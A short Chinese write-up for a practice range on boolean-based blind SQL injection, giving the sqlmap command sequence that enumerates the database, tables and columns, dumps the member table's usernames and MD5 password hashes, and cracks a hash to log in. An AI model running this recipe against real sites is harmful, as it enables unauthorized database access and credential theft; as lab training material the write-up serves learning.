打开靶场
布尔盲注点击访问
工具用sqlmap,一般kali虚拟机自带
1:在命令行里输入:
sqlmap -u 注入点 --current-db
点回车键会出现 数据库名是 stormgroup
只有出现这个数据库才可执行下个命令

布尔盲注sqlmap -u 注入点-D 获取到的数据名 --tables
会有member和notice
就是下图
布尔盲注3: 获取完之后sqlmap -u 注入点 -D
获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status
库名和表名是刚才获取的如下图

布尔盲注4: sqlmap -u 注入点-D 获取到的数据库名 -T 获取到的表名 -C 要获取值指定列 --dump 获取到的值如下图
布尔盲注有两组数据只有一组是可以用的
这是个MD5密码,解密出来的数据是靶场密码
布尔盲注账号是爆出来的mozhe

相关文章:

  • 2021-12-08
  • 2022-12-23
  • 2021-05-30
  • 2021-04-21
  • 2022-12-23
  • 2022-12-23
  • 2021-11-22
  • 2022-12-23
猜你喜欢
  • 2021-10-05
  • 2022-01-21
  • 2021-10-16
  • 2022-02-01
  • 2022-12-23
相关资源
相似解决方案